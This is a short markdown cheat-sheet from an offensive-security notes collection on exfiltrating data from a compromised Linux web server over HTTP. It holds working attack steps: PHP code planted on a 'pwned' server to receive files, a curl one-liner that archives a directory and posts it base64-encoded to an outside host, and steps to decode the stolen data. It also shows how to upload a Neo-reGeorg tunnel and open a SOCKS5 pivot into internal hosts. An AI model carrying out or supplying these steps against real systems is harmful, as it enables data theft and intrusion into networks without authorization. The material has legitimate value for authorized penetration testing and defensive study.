killchain-compendium/exfiltration/linux/http_php.md

1004 B

HTTP/PHP Exfiltration

  • On a pwned web server concat the following PHP code to an existing page
<?php 
if (isset($_POST['file'])) {
        $file = fopen("/tmp/out.b64","w");
        fwrite($file, $_POST['file']);
        fclose($file);
   }
?>
  • POST the payload to the controlled web server
curl --data "file=$(tar zcf - <directory> | base64)" http://example.com/about.php
  • Prepare the stored file through removing the url encoding
sudo sed -i 's/ /+/g' /tmp/out.b64
  • Unarchive the data
cat /tmp/out.b64 | base64 -d | tar xvfz -

Pivot via Tunneling over HTTP

python3 neoreg.py generate -k key.enc
  • Upload tunnel.php to the web server created
  • Trigger the tunnel via
python3 neoreg.py -k key.enc -u http://example.com/tunnel.php
  • Start socks5 via
curl --socks5 127.0.0.1:1080 http://target.example.com